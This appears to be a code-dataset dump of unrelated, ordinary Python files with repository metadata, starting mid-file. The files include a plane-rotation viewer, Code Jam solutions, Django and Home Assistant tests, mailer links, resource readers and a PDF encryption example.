    tilt = np.radians(tilt_slider.val)
    # Elementary rotations about X (tilt), Y (elevation) and Z (azimuth).
    Rt = np.array([[1,0,0],
                   [0,np.cos(-tilt),-np.sin(-tilt)],
                   [0,np.sin(-tilt),np.cos(-tilt)]])
    Re = np.array([[np.cos(-ele),0,np.sin(-ele)],
                   [0,1,0],
                   [-np.sin(-ele),0,np.cos(-ele)]])
    Ra = np.array([[np.cos(azim),-np.sin(azim),0],
                   [np.sin(azim),np.cos(azim),0],
                   [0,0,1]])
    Rrev = np.array([[-1,0,0],  # rotates the plane to face you instead of away from you
                     [0,-1,0],
                     [0,0,1]])
    R = Rrev.dot(Rt).dot(Re).dot(Ra)
    # Replace the previously drawn aircraft with the re-rotated one.
    global line
    line.remove()
    [line] = ax.plot(*draw_plane_nwu(R.dot(plane)), linewidth=2, color='red')

    # now assuming Z_1*Y_2*X_3: extract Euler angles back from R
    pitch = -np.arcsin(R[2,0])
    roll = np.arctan2(R[2,1],R[2,2])
    yaw = np.arctan2(R[1,0],R[0,0])
    # NOTE: Python 2 print statement -- this script predates Python 3.
    print 'yaw', np.degrees(yaw), 'pitch', np.degrees(pitch), 'roll',np.degrees(roll)

    # Rr = np.array([[1,0,0],
    #                [0,np.cos(roll),-np.sin(roll)],
    #                [0,np.sin(roll),np.cos(roll)]])
    # Rp = np.array([[np.cos(pitch),0,np.sin(pitch)],
    #                [0,1,0],
    #                [-np.sin(pitch),0,np.cos(pitch)]])
    # Ry = np.array([[np.cos(yaw),-np.sin(yaw),0],
    #                [np.sin(yaw),np.cos(yaw),0],
    #                [0,0,1]])
    # R = Ry.dot(Rp).dot(Rr)
    # global line2
    # line2.remove()
    # [line2] = ax.plot(*draw_plane_nwu(R.dot(plane)), linewidth=2, color='blue')
    fig.canvas.draw_idle()

# Redraw whenever any of the three sliders moves.
azim_slider.on_changed(sliders_on_changed)
ele_slider.on_changed(sliders_on_changed)
tilt_slider.on_changed(sliders_on_changed)

plt.show()
| [
"jaringson@gmail.com"
] | jaringson@gmail.com |
840c7e4b607bbbfba8780d7200c113b9d8d33362 | 95e8ff5910648df82a1d6dd538b535142be96162 | /SnakeGame/Map.py | 3583ecf10a0df739986225f8835032f30dc5e52d | [] | no_license | visittor/RL | 862d60821a8a52a532ce8ec742e67ef79c772545 | d110e070f9dd0b78cd61281774c567513aa984e2 | refs/heads/master | 2021-07-02T19:24:14.521192 | 2020-10-31T14:42:02 | 2020-10-31T14:42:02 | 221,648,260 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 274 | py |
class Map( object ):
def __init__( self, width: int, height: int ):
self.__width = width
self.__height = height
@property
def width( self ):
return self.__width
@property
def height( self ):
return self.__height | [
"chattarin.rodpon@gmail.com"
] | chattarin.rodpon@gmail.com |
7d298047fa3855b4c60842492f353cf8185c2917 | 94872a7ee1f7cd64a59e59c2092b18f48954d9eb | /IlijaCollector/cleanup.py | cdfbbc2987a069c52d943697dadd948707fcac53 | [] | no_license | ivukotic/FAXtools | 106957227a7033c6eaaeca29e30f859307c7ebbb | 0b9068f0b82f03c5422f7f66615e9d4083d77388 | refs/heads/master | 2020-04-06T03:33:51.797364 | 2016-11-16T16:45:05 | 2016-11-16T16:45:05 | 6,708,845 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 967 | py | #!/usr/bin/python
from datetime import datetime
import xml.etree.ElementTree as ET
@outputSchema("CLEANED:tuple(SRC:chararray,SITE:chararray,TOS:long,TOD:long,TOE:long,IN:long,OUT:long)")
def XMLtoNTUP(xmlInput):
    """Pig UDF: flatten one xrootd summary-report XML blob into a tuple.

    Fields read from the report's root attributes and child elements:
      SRC  -- 'src' attribute (server name)
      SITE -- 'site' attribute (sitename as set by the endpoint)
      TOS  -- 'tos' attribute (time the service started)
      TOD  -- 'tod' attribute (time the statistics gathering started)
      TOE  -- <toe> under the 'sgen' child (end of the stats window)
      IN   -- <in>  under the 'link' child (bytes in)
      OUT  -- <out> under the 'link' child (bytes out)

    Fixes vs. the previous revision: removed an unused accumulator list
    and a Python-2-only debug print of every child element.
    """
    root = ET.fromstring(xmlInput)
    SRC = root.attrib['src']    # server name
    SITE = root.attrib['site']  # sitename as set by the endpoint
    TOS = root.attrib['tos']    # time the service started
    TOD = root.attrib['tod']    # time the statistics gathering started
    # NOTE(review): TOS/TOD are returned as strings although the schema
    # declares them long -- confirm Pig coerces them downstream.
    for child in root:
        if child.attrib['id'] == 'link':
            for c in child:
                if c.tag == 'in':
                    IN = long(c.text)
                if c.tag == 'out':
                    OUT = long(c.text)
        if child.attrib['id'] == 'sgen':
            for c in child:
                if c.tag == 'toe':
                    TOE = long(c.text)
    # NOTE(review): IN/OUT/TOE are unbound (NameError) if the 'link' or
    # 'sgen' sections are missing from the report.
    return (SRC, SITE, TOS, TOD, TOE, IN, OUT)
| [
"ivukotic@cern.ch"
] | ivukotic@cern.ch |
bf1e5321014ae815ae54a903c7dbd9492dc21a4b | 628ec414b7807fc50de67345361e41cc68ba3720 | /mayan/apps/mailer/links.py | ff70be2f8437a595c00305f37b45fb2a84c475bf | [
"Apache-2.0"
] | permissive | TestingCodeReview/Mayan-EDMS | aafe144424ffa8128a4ff7cee24d91bf1e1f2750 | d493ec34b2f93244e32e1a2a4e6cda4501d3cf4e | refs/heads/master | 2020-05-27T23:34:44.118503 | 2019-04-05T02:04:18 | 2019-04-05T02:04:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,503 | py | from __future__ import unicode_literals
from django.utils.translation import ugettext_lazy as _
from navigation import Link
from .icons import (
icon_system_mailer_error_log, icon_user_mailer_create,
icon_user_mailer_list, icon_user_mailer_setup
)
from .permissions import (
permission_mailing_link, permission_mailing_send_document,
permission_user_mailer_create, permission_user_mailer_delete,
permission_user_mailer_edit, permission_user_mailer_use,
permission_user_mailer_view, permission_view_error_log
)
# --- Document mailing actions (single and multi-select variants) ---
link_send_document = Link(
    args='resolved_object.pk', permissions=(permission_mailing_send_document,),
    text=_('Email document'), view='mailer:send_document'
)
link_send_document_link = Link(
    args='resolved_object.pk', permissions=(permission_mailing_link,),
    text=_('Email link'), view='mailer:send_document_link'
)
link_send_multiple_document = Link(
    text=_('Email document'), view='mailer:send_multiple_document'
)
link_send_multiple_document_link = Link(
    text=_('Email link'), view='mailer:send_multiple_document_link'
)
# --- System mailer ---
link_system_mailer_error_log = Link(
    icon_class=icon_system_mailer_error_log,
    permissions=(permission_view_error_log,),
    text=_('System mailer error log'), view='mailer:system_mailer_error_log',
)
# --- User mailing-profile management (CRUD, log, test) ---
link_user_mailer_create = Link(
    icon_class=icon_user_mailer_create,
    permissions=(permission_user_mailer_create,),
    text=_('User mailer create'), view='mailer:user_mailer_backend_selection',
)
link_user_mailer_delete = Link(
    args='resolved_object.pk', permissions=(permission_user_mailer_delete,),
    tags='dangerous', text=_('Delete'), view='mailer:user_mailer_delete',
)
link_user_mailer_edit = Link(
    args='object.pk', permissions=(permission_user_mailer_edit,),
    text=_('Edit'), view='mailer:user_mailer_edit',
)
link_user_mailer_log_list = Link(
    args='object.pk', permissions=(permission_user_mailer_view,),
    text=_('Log'), view='mailer:user_mailer_log',
)
link_user_mailer_list = Link(
    icon_class=icon_user_mailer_list,
    permissions=(permission_user_mailer_view,),
    text=_('Mailing profiles list'), view='mailer:user_mailer_list',
)
link_user_mailer_setup = Link(
    icon_class=icon_user_mailer_setup,
    permissions=(permission_user_mailer_view,),
    text=_('Mailing profiles'), view='mailer:user_mailer_list',
)
link_user_mailer_test = Link(
    args='object.pk', permissions=(permission_user_mailer_use,),
    text=_('Test'), view='mailer:user_mailer_test',
)
| [
"roberto.rosario.gonzalez@gmail.com"
] | roberto.rosario.gonzalez@gmail.com |
89a57b2761ac7eb2700a21a0db54eb81630a8f82 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_135/688.py | 93210bdda7e5caabc402c9844a34c004ac9fb43c | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 531 | py | def solve(a, A, b, B):
s = set(A[a-1]).intersection(set(B[b-1]))
if len(s) == 1:
return str(list(s)[0])
if len(s) == 0:
return "Volunteer cheated!"
if len(s) > 1:
return "Bad magician!"
def main():
    # Python 2 Code Jam driver: first line is the number of test cases.
    T = int(raw_input())
    for t in xrange(1, T+1):
        # Round one: answer row chosen, then the 4x4 grid.
        a = int(raw_input())
        A = [map(int, raw_input().split()) for i in xrange(4)]
        # Round two: answer row chosen, then the second 4x4 grid.
        b = int(raw_input())
        B = [map(int, raw_input().split()) for i in xrange(4)]
        print "Case #{0}: {1}".format(t, solve(a, A, b, B))

if __name__ == '__main__':
    main()
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
8b349f526cd1c606c03ddd508c7189b821aade82 | 9e5353ba6e50f77a40a765bd494d8bfb990c8922 | /scratch/socket_test.py | df65b498efcb3ac969bc64dd918a76b336d66797 | [] | no_license | admiralbolt/stream-stuff | d9e24f1d78ac142416525b9b42cc53ef0bc4712a | 29cfa96f9e8d40c531362aced47ebacadccbe759 | refs/heads/master | 2023-08-05T00:02:17.812991 | 2021-09-23T05:47:16 | 2021-09-23T05:47:16 | 261,022,447 | 7 | 0 | null | null | null | null | UTF-8 | Python | false | false | 795 | py | import asyncio
import sys
import os
import time
import websockets
# Make the project packages importable when running this scratch script from
# its own directory (adds ../stream_backend/api/utils and ../stream_backend).
sys.path.append(os.path.realpath(os.path.join(
  os.getcwd(),
  "..",
  "stream_backend/api/utils"
)))
sys.path.append(os.path.realpath(os.path.join(
  os.getcwd(),
  "..",
  "stream_backend"
)))
from websocket_client import WebSocketClient
# Module-level smoke test: connect the project wrapper client to the local
# websocket server on port 7004.
websocket_client = WebSocketClient(7004)
asyncio.run(websocket_client.connect(), debug=True)
async def cool():
  # Connect via the project wrapper and send a probe message.
  websocket_client = WebSocketClient(7004)
  await websocket_client.connect()
  print(websocket_client.socket.open)  # True if the handshake succeeded
  await websocket_client.send("asdf")
async def test():
  # Same probe, but using the `websockets` library directly.
  uri = "ws://localhost:7004"
  async with websockets.connect(uri) as websocket:
    print(websocket.open)
    await websocket.send("asdf")
asyncio.run(cool())
| [
"aviknecht@gmail.com"
] | aviknecht@gmail.com |
40bf64c084dd22ce89891bfea90ef07df3538dbf | e3c8f786d09e311d6ea1cab50edde040bf1ea988 | /Incident-Response/Tools/dfirtrack/dfirtrack_main/tests/system_importer/test_system_importer_file_csv_forms.py | b37856c7b92f51a0a17dc34c1510029c05cfcafc | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | foss2cyber/Incident-Playbook | d1add8aec6e28a19e515754c6ce2e524d67f368e | a379a134c0c5af14df4ed2afa066c1626506b754 | refs/heads/main | 2023-06-07T09:16:27.876561 | 2021-07-07T03:48:54 | 2021-07-07T03:48:54 | 384,988,036 | 1 | 0 | MIT | 2021-07-11T15:45:31 | 2021-07-11T15:45:31 | null | UTF-8 | Python | false | false | 1,512 | py | from django.core.files.uploadedfile import SimpleUploadedFile
from django.test import TestCase
from dfirtrack_main.importer.file.csv_importer_forms import SystemImporterFileCsvForm
class SystemImporterFileCsvFormTestCase(TestCase):
    """Unit tests for ``SystemImporterFileCsvForm``."""

    def test_system_importer_file_csv_systemcsv_form_label(self):
        """The file field carries the expected user-facing label."""
        csv_form = SystemImporterFileCsvForm()
        self.assertEqual(csv_form.fields['systemcsv'].label, 'CSV with systems (*)')

    def test_system_importer_file_csv_form_empty(self):
        """Submitting no data at all fails validation."""
        csv_form = SystemImporterFileCsvForm(data = {})
        self.assertFalse(csv_form.is_valid())

    def test_system_importer_file_csv_systemcsv_form_filled(self):
        """Uploading a minimal well-formed CSV passes validation."""
        # Read the fixture and wrap it the way a browser upload arrives.
        with open('dfirtrack_main/tests/system_importer/system_importer_file_csv_files/system_importer_file_csv_testfile_01_minimal_double_quotation.csv', 'rb') as sample_csv:
            uploaded = SimpleUploadedFile(sample_csv.name, sample_csv.read())
        csv_form = SystemImporterFileCsvForm(
            data = {},
            files = {'systemcsv': uploaded},
        )
        self.assertTrue(csv_form.is_valid())
| [
"a.songer@protonmail.com"
] | a.songer@protonmail.com |
63a46a45858243d9ebeee22d91f29779a70a5139 | dfcb65de02953afaac24cc926ee32fcdede1ac21 | /src/pyrin/utilities/string/normalizer/interface.py | 2ce7bc744c3717bbd93b06339e34ad637f686f5b | [
"BSD-3-Clause"
] | permissive | mononobi/pyrin | 031d0c38da945b76b07ea100554ffc7f8081b05e | 9d4776498225de4f3d16a4600b5b19212abe8562 | refs/heads/master | 2023-08-31T03:56:44.700142 | 2023-08-20T22:20:06 | 2023-08-20T22:20:06 | 185,481,041 | 20 | 8 | null | null | null | null | UTF-8 | Python | false | false | 1,585 | py | # -*- coding: utf-8 -*-
"""
string normalizer interface module.
"""
from abc import abstractmethod
from threading import Lock
from pyrin.core.structs import CoreObject, MultiSingletonMeta
from pyrin.core.exceptions import CoreNotImplementedError
class StringNormalizerSingletonMeta(MultiSingletonMeta):
    """
    Metaclass that makes every string normalizer class a singleton.

    Thread safety is provided by the shared class-level lock.
    """

    # one cached instance per concrete normalizer class
    _instances = {}
    _lock = Lock()
class AbstractStringNormalizerBase(CoreObject, metaclass=StringNormalizerSingletonMeta):
    """
    Base class that every concrete string normalizer must extend.
    """

    @abstractmethod
    def normalize(self, value, *args, **options):
        """
        normalizes the given value.

        :param str value: value to be normalized.

        :keyword bool strip: strip spaces from both ends of value.
                             defaults to True if not provided.

        :keyword bool normalize_none: if the given value is None, return an
                                      empty string instead of None.
                                      defaults to False if not provided.

        :raises CoreNotImplementedError: core not implemented error.

        :returns: normalized value.
        :rtype: str
        """
        raise CoreNotImplementedError()

    @property
    @abstractmethod
    def priority(self):
        """
        gets the priority of this normalizer.

        :raises CoreNotImplementedError: core not implemented error.

        :rtype: int
        """
        raise CoreNotImplementedError()
| [
"mohamadnobakht@gmail.com"
] | mohamadnobakht@gmail.com |
d5b2de6fa50598faa7966662ac5ed602f5303daa | f576f0ea3725d54bd2551883901b25b863fe6688 | /sdk/datafactory/azure-mgmt-datafactory/generated_samples/integration_runtimes_get_monitoring_data.py | 162c40fb7e0725dfc7072eec2fbc63a3639f0451 | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | Azure/azure-sdk-for-python | 02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c | c2ca191e736bb06bfbbbc9493e8325763ba990bb | refs/heads/main | 2023-09-06T09:30:13.135012 | 2023-09-06T01:08:06 | 2023-09-06T01:08:06 | 4,127,088 | 4,046 | 2,755 | MIT | 2023-09-14T21:48:49 | 2012-04-24T16:46:12 | Python | UTF-8 | Python | false | false | 1,716 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.datafactory import DataFactoryManagementClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-datafactory
# USAGE
python integration_runtimes_get_monitoring_data.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
    """Fetch monitoring data for one integration runtime and print it."""
    # Credentials are resolved from the environment variables described in the
    # module docstring (AZURE_CLIENT_ID / AZURE_TENANT_ID / AZURE_CLIENT_SECRET).
    mgmt_client = DataFactoryManagementClient(
        credential=DefaultAzureCredential(),
        subscription_id="12345678-1234-1234-1234-12345678abc",
    )
    monitoring_data = mgmt_client.integration_runtimes.get_monitoring_data(
        resource_group_name="exampleResourceGroup",
        factory_name="exampleFactoryName",
        integration_runtime_name="exampleIntegrationRuntime",
    )
    print(monitoring_data)
# x-ms-original-file: specification/datafactory/resource-manager/Microsoft.DataFactory/stable/2018-06-01/examples/IntegrationRuntimes_GetMonitoringData.json
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | Azure.noreply@github.com |
4e983363b19bdb916fd76195d601d24d9e9ee54c | 6b2a8dd202fdce77c971c412717e305e1caaac51 | /solutions_1483485_0/Python/laurentr/translate.py | a0ba9e164e94e4f8cb12d6e20191bbc65c9ef4c7 | [] | no_license | alexandraback/datacollection | 0bc67a9ace00abbc843f4912562f3a064992e0e9 | 076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf | refs/heads/master | 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 647 | py | #!/usr/bin/python
# Google Code Jam "Googlerese" decoder (Python 2; string.maketrans was
# removed in Python 3).  The two strings below define the substitution
# cipher: each character of `googlerese` maps to the character at the same
# index in `english`.
from string import maketrans
googlerese = "qzejp mysljylc kd kxveddknmc re jsicpdrysi rbcpc ypc rtcsra dkh wyfrepkym veddknkmkrkcd de kr kd eoya kw aej tysr re ujdr lkgc jv"
english = "zqour language is impossible to understand there are twenty six factorial possibilities so it is okay if you want to just give up"
trad = maketrans(googlerese, english)  # 256-byte translation table
with open('./input.txt', 'r+') as f:
    with open('./output.txt', 'w') as fout:
        line = f.readline()
        T = int(line)  # number of test cases
        for n in range(T):
            # The trailing newline is not in the table, so it passes through.
            line = f.readline()
            fout.write("Case #"+str(n+1)+": "+line.translate(trad))
| [
"eewestman@gmail.com"
] | eewestman@gmail.com |
601d1d090416b33f87346019500e4e1cadd9f83c | ae5208474f3fc2a5f506e8bf0e8cdc62591f6f19 | /tests/test_softclip_clusterfinder.py | 1a655b8da68ef5dfc56fc7052ab010a253d4e273 | [
"MIT"
] | permissive | andurill/readtagger | e32ca519f955d4d80c0d4561e6ecb1e591be7458 | 127ec08c00c47d03dfb8e95b628c381d3e29a6c8 | refs/heads/master | 2020-04-27T19:58:15.549676 | 2019-03-29T16:18:23 | 2019-03-29T16:40:41 | 174,641,225 | 0 | 0 | null | 2019-03-09T03:00:12 | 2019-03-09T03:00:11 | null | UTF-8 | Python | false | false | 788 | py | from readtagger.find_softclip_clusters import (
SoftClipClusterFinder,
)
WRONG_TSD = 'wrong_tsd.bam'
MULTI_H6 = 'multisample_h6.bam'
def test_softclip_clusterfinder(datadir_copy, tmpdir):  # noqa: D103, F811
    """Cluster soft-clipped reads in the wrong-TSD BAM and count the clusters."""
    bam_path = str(datadir_copy[WRONG_TSD])
    gff_path = tmpdir.join('out.gff').strpath
    finder = SoftClipClusterFinder(input_path=bam_path, output_gff=gff_path)
    assert len(finder.clusters) == 8
def test_softclip_clusterfinder_multi_h6(datadir_copy, tmpdir):  # noqa: D103, F811
    """Cluster soft-clipped reads in the multi-sample h6 BAM and count the clusters."""
    bam_path = str(datadir_copy[MULTI_H6])
    gff_path = tmpdir.join('out.gff').strpath
    finder = SoftClipClusterFinder(input_path=bam_path, output_gff=gff_path)
    assert len(finder.clusters) == 8
| [
"m.vandenbeek@gmail.com"
] | m.vandenbeek@gmail.com |
2d965d93ee20271285cb99c1135e2c911f7b5092 | 8b42c2c1fc8481f52e0c75d69cdd832029533a01 | /src/stump_data_pipeline/util/string.py | b8bd768816efe4a6f54917e1d762e51e27c4349b | [
"MIT"
] | permissive | stump-vote/stump-data-pipeline | 33e59e0e22ede06626421a2da7d52650b23294b0 | 7a8a27577f20cc4f4bdcbf20fe9664b69efa6953 | refs/heads/master | 2022-12-24T05:45:49.923308 | 2020-04-18T21:57:47 | 2020-04-18T21:57:47 | 253,142,064 | 0 | 1 | MIT | 2022-12-08T09:33:08 | 2020-04-05T02:44:15 | Python | UTF-8 | Python | false | false | 196 | py | def camel_to_snake(s):
return s[0] + "".join(
[
"_" + s[i].lower() if s[i - 1].islower() and s[i].isupper() else s[i]
for i in range(1, len(s))
]
)
| [
"galbwe92@gmail.com"
] | galbwe92@gmail.com |
90686270cec5374b3b24720cb1ca17eea5d31799 | 9acd4d3abca1058dade7771403e1eb9b7436f842 | /Plugins/Modules/importlib_resources/readers.py | 19450f461c8d58aec6de6bb92e55cd833af11c1d | [] | no_license | candy-kk/FrameScan | 900595c00e329200c792a7edd418e2e1cef1e539 | e4cfa0e6d0c457d14f7177c78b653b923184061a | refs/heads/master | 2023-05-10T15:45:46.565422 | 2023-04-12T04:56:15 | 2023-04-12T04:56:15 | 263,955,799 | 0 | 0 | null | 2020-05-14T15:40:27 | 2020-05-14T15:40:26 | null | UTF-8 | Python | false | false | 3,669 | py | import collections
import pathlib
import operator
from . import abc
from ._itertools import unique_everseen
from ._compat import ZipPath
def remove_duplicates(items):
    """Iterate *items* in first-seen order, skipping repeats."""
    # OrderedDict.fromkeys keeps one slot per distinct item, in input order.
    unique = collections.OrderedDict.fromkeys(items)
    return iter(unique)
class FileReader(abc.TraversableResources):
    """Resource reader for packages that live on the real file system."""

    def __init__(self, loader):
        # The package directory is the parent of the loader's module file.
        self.path = pathlib.Path(loader.path).parent

    def resource_path(self, resource):
        """
        Return the file system path to prevent
        `resources.path()` from creating a temporary
        copy.
        """
        return str(self.path / resource)

    def files(self):
        return self.path
class ZipReader(abc.TraversableResources):
    """Resource reader for packages imported from a zip archive."""

    def __init__(self, loader, module):
        # Only the last dotted component names the package directory in the zip.
        name = module.rpartition('.')[2]
        self.prefix = loader.prefix.replace('\\', '/') + name + '/'
        self.archive = loader.archive

    def open_resource(self, resource):
        # Translate zipfile's KeyError into the file-system error callers expect.
        try:
            return super().open_resource(resource)
        except KeyError as exc:
            raise FileNotFoundError(exc.args[0])

    def is_resource(self, path):
        # workaround for `zipfile.Path.is_file` returning true
        # for non-existent paths.
        candidate = self.files().joinpath(path)
        return candidate.is_file() and candidate.exists()

    def files(self):
        return ZipPath(self.archive, self.prefix)
class MultiplexedPath(abc.Traversable):
    """
    Given a series of Traversable objects, implement a merged
    version of the interface across all objects. Useful for
    namespace packages which may be multihomed at a single
    name.
    """
    def __init__(self, *paths):
        # De-duplicate while preserving order; every entry must be a directory.
        self._paths = list(map(pathlib.Path, remove_duplicates(paths)))
        if not self._paths:
            message = 'MultiplexedPath must contain at least one path'
            raise FileNotFoundError(message)
        if not all(path.is_dir() for path in self._paths):
            raise NotADirectoryError('MultiplexedPath only supports directories')
    def iterdir(self):
        # Chain the children of every underlying directory; when the same
        # name appears in several directories, only the first one is yielded.
        files = (file for path in self._paths for file in path.iterdir())
        return unique_everseen(files, key=operator.attrgetter('name'))
    def read_bytes(self):
        # A multiplexed path always represents a directory, never a file.
        raise FileNotFoundError(f'{self} is not a file')
    def read_text(self, *args, **kwargs):
        raise FileNotFoundError(f'{self} is not a file')
    def is_dir(self):
        return True
    def is_file(self):
        return False
    def joinpath(self, *descendants):
        try:
            return super().joinpath(*descendants)
        except abc.TraversalError as exc:
            # One of the paths didn't resolve.
            msg, target, names = exc.args
            if names:  # pragma: nocover
                raise
            # It was the last; construct result with the first path.
            return self._paths[0].joinpath(target)
    def open(self, *args, **kwargs):
        raise FileNotFoundError(f'{self} is not a file')
    @property
    def name(self):
        # Report the final component of the first underlying path.
        return self._paths[0].name
    def __repr__(self):
        paths = ', '.join(f"'{path}'" for path in self._paths)
        return f'MultiplexedPath({paths})'
class NamespaceReader(abc.TraversableResources):
    """Resource reader backed by a namespace package's _NamespacePath."""

    def __init__(self, namespace_path):
        # Guard against being handed something other than a namespace path.
        if 'NamespacePath' not in str(namespace_path):
            raise ValueError('Invalid path')
        self.path = MultiplexedPath(*namespace_path)

    def resource_path(self, resource):
        """
        Return the file system path to prevent
        `resources.path()` from creating a temporary
        copy.
        """
        return str(self.path.joinpath(resource))

    def files(self):
        return self.path
| [
"qianxiao996@126.com"
] | qianxiao996@126.com |
9f40d1c70876a29a78325e983cb7fc89dcffd860 | c9094a4ed256260bc026514a00f93f0b09a5d60c | /tests/components/abode/test_cover.py | bb1b8fceffb4d6028a08e4dce81c2148a8035c1a | [
"Apache-2.0"
] | permissive | turbokongen/home-assistant | 824bc4704906ec0057f3ebd6d92788e096431f56 | 4ab0151fb1cbefb31def23ba850e197da0a5027f | refs/heads/dev | 2023-03-12T05:49:44.508713 | 2021-02-17T14:06:16 | 2021-02-17T14:06:16 | 50,231,140 | 4 | 1 | Apache-2.0 | 2023-02-22T06:14:30 | 2016-01-23T08:55:09 | Python | UTF-8 | Python | false | false | 2,112 | py | """Tests for the Abode cover device."""
from unittest.mock import patch
from homeassistant.components.abode import ATTR_DEVICE_ID
from homeassistant.components.cover import DOMAIN as COVER_DOMAIN
from homeassistant.const import (
ATTR_ENTITY_ID,
ATTR_FRIENDLY_NAME,
SERVICE_CLOSE_COVER,
SERVICE_OPEN_COVER,
STATE_CLOSED,
)
from .common import setup_platform
DEVICE_ID = "cover.garage_door"
async def test_entity_registry(hass):
    """Tests that the devices are registered in the entity registry."""
    await setup_platform(hass, COVER_DOMAIN)
    registry = await hass.helpers.entity_registry.async_get_registry()
    registry_entry = registry.async_get(DEVICE_ID)
    assert registry_entry.unique_id == "61cbz3b542d2o33ed2fz02721bda3324"
async def test_attributes(hass):
    """Test the cover attributes are correct."""
    await setup_platform(hass, COVER_DOMAIN)
    state = hass.states.get(DEVICE_ID)
    attributes = state.attributes
    assert state.state == STATE_CLOSED
    assert attributes.get(ATTR_DEVICE_ID) == "ZW:00000007"
    assert not attributes.get("battery_low")
    assert not attributes.get("no_response")
    assert attributes.get("device_type") == "Secure Barrier"
    assert attributes.get(ATTR_FRIENDLY_NAME) == "Garage Door"
async def test_open(hass):
    """Test the cover can be opened."""
    await setup_platform(hass, COVER_DOMAIN)
    # Patch the library call so no real device is touched.
    with patch("abodepy.AbodeCover.open_cover") as mock_open:
        service_data = {ATTR_ENTITY_ID: DEVICE_ID}
        await hass.services.async_call(
            COVER_DOMAIN, SERVICE_OPEN_COVER, service_data, blocking=True
        )
        await hass.async_block_till_done()
        mock_open.assert_called_once()
async def test_close(hass):
    """Test the cover can be closed."""
    await setup_platform(hass, COVER_DOMAIN)
    # Patch the library call so no real device is touched.
    with patch("abodepy.AbodeCover.close_cover") as mock_close:
        service_data = {ATTR_ENTITY_ID: DEVICE_ID}
        await hass.services.async_call(
            COVER_DOMAIN, SERVICE_CLOSE_COVER, service_data, blocking=True
        )
        await hass.async_block_till_done()
        mock_close.assert_called_once()
| [
"noreply@github.com"
] | turbokongen.noreply@github.com |
ac148293cc34566d29a0aabb1f1be353fc280f07 | 2aba62d66c2c622bdc148cef451da76cae5fd76c | /exercise/learn_python_dm2039/ch27/ch27_8.py | 47b5afb38beeb7cebb5ce67f0307e4f8d7ff2485 | [] | no_license | NTUT-109AB8011/crawler | 6a76de2ab1848ebc8365e071e76c08ca7348be62 | a703ec741b48d3af615a757fed7607b1f8eb66a6 | refs/heads/master | 2023-03-26T22:39:59.527175 | 2021-03-30T03:29:22 | 2021-03-30T03:29:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 520 | py | # ch27_8.py
# Copy travel.pdf page by page into a new PDF, encrypt it, and save it.
import PyPDF2
pdfObj = open('travel.pdf','rb')
pdfRd = PyPDF2.PdfFileReader(pdfObj)
pdfWr = PyPDF2.PdfFileWriter() # the new (output) PDF object
for pageNum in range(pdfRd.numPages):
    pdfWr.addPage(pdfRd.getPage(pageNum)) # copy one page at a time into the new PDF
pdfWr.encrypt('deepstone') # apply encryption (password: 'deepstone')
encryptPdf = open('output.pdf', 'wb') # open the binary file for writing
pdfWr.write(encryptPdf) # write out the encrypted PDF
encryptPdf.close()
| [
"terranandes@gmail.com"
] | terranandes@gmail.com |
61f0993386e6185701397450a63a17faaa724432 | 04cd80564d67e3e946ec66fd80e95b858693eae8 | /backend/home/models.py | 0b984ee292c699d3ac7c48b92354b8e56caff465 | [] | no_license | crowdbotics-apps/new-rn-app-dev-1106 | 3307dd21fc0605bd9f471367faca97d6da6d77d4 | 8948a5b8b52198b55ce24b6e60a1c9e24293056a | refs/heads/master | 2023-01-25T01:36:41.979381 | 2019-12-02T21:11:21 | 2019-12-02T21:11:21 | 221,566,041 | 0 | 0 | null | 2023-01-24T00:51:39 | 2019-11-13T22:47:04 | JavaScript | UTF-8 | Python | false | false | 558 | py | from django.db import models
# Create your models here.
from django.db import models
class CustomText(models.Model):
    """A single editable line of text shown on the app's home screen."""

    title = models.CharField(max_length=150)

    def __str__(self):
        return self.title

    @property
    def api(self):
        # REST endpoint for this record.
        return f"/api/v1/customtext/{self.id}/"

    @property
    def field(self):
        # Name of the editable field exposed by the API.
        return "title"
class HomePage(models.Model):
    """Free-form body content for the app's home page."""

    body = models.TextField()

    @property
    def api(self):
        # REST endpoint for this record.
        return f"/api/v1/homepage/{self.id}/"

    @property
    def field(self):
        # Name of the editable field exposed by the API.
        return "body"
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
